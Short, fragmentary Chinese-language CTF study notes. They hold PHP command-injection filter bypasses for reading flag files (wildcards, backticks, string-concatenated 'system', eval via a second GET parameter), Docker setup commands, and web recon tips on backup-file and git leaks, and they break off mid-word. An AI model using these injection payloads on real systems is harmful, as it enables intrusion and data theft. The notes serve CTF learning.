flag被过滤：system('tac fla*'); system被过滤：echo `tac fla*` 拼接法：?c=$a=sys;$b=tem;$c=$a.$b;$c("tac fla*"); 再传参：?c=eval($_GET[1]);&1=system("tac flag.php"); 利

docker部署 sudo apt update apt install docker apt install docker-compose cd sudo docker-compose up - d INF：表示“无穷大”，通常在除以零的操作中出现，例如1.0/0.0 NaN：表示“不是一个数字”

F12，注释里面找 打不开F12，选中 url 按F12，url 前加view-source：，ctrl+u 没思路抓包看看 不会藏在robots.txt里面吧 备份文件泄露：index.phps；Linux的备份文件：index.php.swp；www.zip；fzbk 扫描 git泄露，访问.g